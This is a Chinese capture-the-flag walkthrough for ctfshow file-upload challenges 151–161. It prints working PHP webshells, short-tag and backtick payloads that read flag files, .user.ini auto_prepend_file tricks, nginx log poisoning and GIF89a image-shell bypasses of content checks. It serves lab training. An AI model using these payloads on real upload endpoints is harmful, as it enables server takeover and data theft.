ctfshow——文件上传

文件上传思路

web 151

打开页面显示：前台校验不可靠。说明这题是前端验证。

右键查看源代码，找到与上传点有关的前端代码：

  这里使用了一个叫Layui的组件库，url代表上传接口，accept代表允许上传的文件类型，exts代表允许上传的文件后缀。可见这里前端只允许上传图片类型的文件，且文件后缀名为png。

  绕过前端验证的最简单方法就是，上传一个png的webshell，再使用burp抓包更改文件后缀名，再访问上传的webshell。


可见，上传成功~，下一步就是写一个shell<?php @eval($_POST['cmd']);?>，用webshell连接工具蚁剑去连接上传的webshell。

这里我们详细分析一句话木马，不借助工具获取flag。

1. php代码要写在<?php ?>中，php解析器才会认出这是php代码；
2. @符号的意思是不报错，即使执行错误，也不报错；
3. eval()：把字符串当做PHP代码执行；
4. $_POST['cmd']接收POST传参，传参的变量名叫cmd。

   除了POST传参，还有GET传参$_GET['cmd']、全局的传参方法$_REQUEST['cmd']（不管是GET传参 or POST传参 or FIlE传参 or COOKIE传参）。

5. php执行系统命令的函数有system()、exec()、shell_exec()、反撇号。php执行外部命令
   

web 152

跟前一题一样的

web 153

知识点

  自PHP 5.3.0起，PHP支持基于每个目录的INI文件配置，此类文件仅被CGI/Fast SAPI处理。如果PHP以模块化的方式运行在Apache里，则.htaccess文件有同样效果。除了主php.ini之外，php还会在每个目录下扫描INI文件，从被执行的PHP文件所在目录开始一直上升到web根目录（$_SERVER[‘DOCUMENT_ROOT’]所指定）。如果被执行的php文件在web根目录之外，则只扫描该目录。

配置选项是有权限的。php.ini是主要的配置文件，.user.ini是用户自定义的配置文件且能覆盖php.ini的内容，php解析器在解析php文件时会扫描.user.ini的配置。

  在.user.ini风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。用人话说就是除了PHP_INI_SYSTEM模式的配置以外都可以在.user.ini中进行重写。两个重要的配置选项：

auto_append_file=filename     //相当于在每个php文件尾加上 include(“filename”)
auto_prepend_file=filename    //相当于文件头加上 include(“filename”)

  利用.user,ini的方法：保证三个文件(.user.ini、shell.png、xx.php)在同一目录下，再执行该目录下的php文件。例如：

	//.user.iniauto_prepend_file=1.png//1.png<?php phpinfo();?>//1.php(任意php文件)

三个文件在一个目录下，就相当于1.php文件开头插入了include('1.png');进行文件包含，因为1.png中有php代码，所以经过include之后会执行shell脚本。

解题

此题前后端都检测content-type值，只允许上传PNG文件。

上传.user.ini文件，内容为auto_prepend_file=shell.png
上传shell.png文件

  从之前可以得知，upload文件夹下有一个index.php的文件，故访问../upload/index.php?cmd=phpinfo();，可以看到phpinfo的页面。

web 154

知识点：过滤<?php
绕过方法：使用短标签进行绕过（没有限制条件）。如：

<?php @eval($_GET['cmd']);?> == <？=@eval($_GET['cmd']);？>

此题过滤了php这一关键词。使用短标签进行绕过。

pyload:

<?=@eval($_GET['cmd']);?>

web 155

同web 154

web 156

知识点：过滤php、[]关键字
绕过方法：

• php关键字被过滤，使用php短标签进行绕过；
• []被过滤，使用{}进行替换。例如：

  <?php @eval($_GET['cmd']);?> ==  <?php @eval($_GET{cmd});?>
  

payload：

<?=system('cat ../fl*')?>

web 157

在前面的基础上，过滤了{、;，而且文件内容不能有php字符串。
绕过方法：

• 过滤;，则在短标签里，可以省略;。例如：

<?php @eval($_GET{cmd});?> == <?php @eval($_GET{cmd})?>

• 过滤{，那就不用eval函数接受参数，再执行系统命令，直接用system()函数执行系统命令。如<?=system(ls)?>
  -cat ../flag.php==cat ../fl*

payload：

<?=system('cat ../fl*')?>

web 158

同web157

web 159

在前面的基础上，过滤了(。绕过方法：直接用反撇号执行系统命令，反撇号就相当于shell_exec()函数。payload：

<?=`cat ../fl*`?>

web160

在前面的基础上，过滤了反撇号。绕过方法：

1. 第一种方法：利用日志包含绕过。就是说有些中间件会将用户访问记录记在日志里，如果将webshell写到日志里，再包含日志，不就可以getshell了吗？操作：

   • 同样先上传.user.ini文件，内容为auto_prepend_file=shell.png；
     

   • 上传shell.png文件，文件内容为<?=include"/var/lo"."g/nginx/access.lo"."g"?>（log关键词被过滤），且将shell写在UA头中。

   • ngnix的日志路径为/var/log/nginx/access.log；
   • php中，可以用.进行字符串的拼接；

   

   • 访问xxx/upload/index.php.

2. 第二种方法：因为已经知道flag的位置，通过php伪协议进行文件读取。

   • 同样先上传.user.ini文件，内容为auto_prepend_file=shell.png；
   • 上传shell.png，文件内容为<?=include"ph"."p://filter/covert.base64-encode/resource=../flag.ph"."p"?>
   • 访问xxx/upload/index.php，再使用base64进行解码即可。
     
     

web 161

这关在前面的基础上，还进行文件内容检测（主要是使用getimagesize()函数进行检测），服务端主要检测文件幻数。其实就是检测文件内容开始的地方，不同后缀名的文件，文件起始的地方是不一样的。

这关很恶心嗷，前端验证只能为png文件，后端检测文件内容必须是gif。

绕过方法：制作图片马，更简单的就是用burp抓包，将你的shell写在文件内容里。

1. 先上传.user.ini文件，内容为auto_prepend_file=shell.png（需要加gif文件的文件幻数GIF89a）；
   
2. 上传shell.png，文件内容为<?=include"ph"."p://filter/covert.base64-encode/resource=../flag.ph"."p"?>，同样要加文件幻数GIF89a。
   
3. 访问../upload/index.php，使用base64进行解码。